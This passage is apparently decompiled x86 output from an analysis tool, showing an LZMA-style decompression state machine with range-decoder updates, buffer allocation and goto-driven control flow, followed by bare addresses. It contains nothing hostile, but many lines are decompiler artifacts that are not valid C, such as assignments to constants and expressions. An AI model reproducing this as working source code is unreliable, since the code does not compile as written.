													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d2
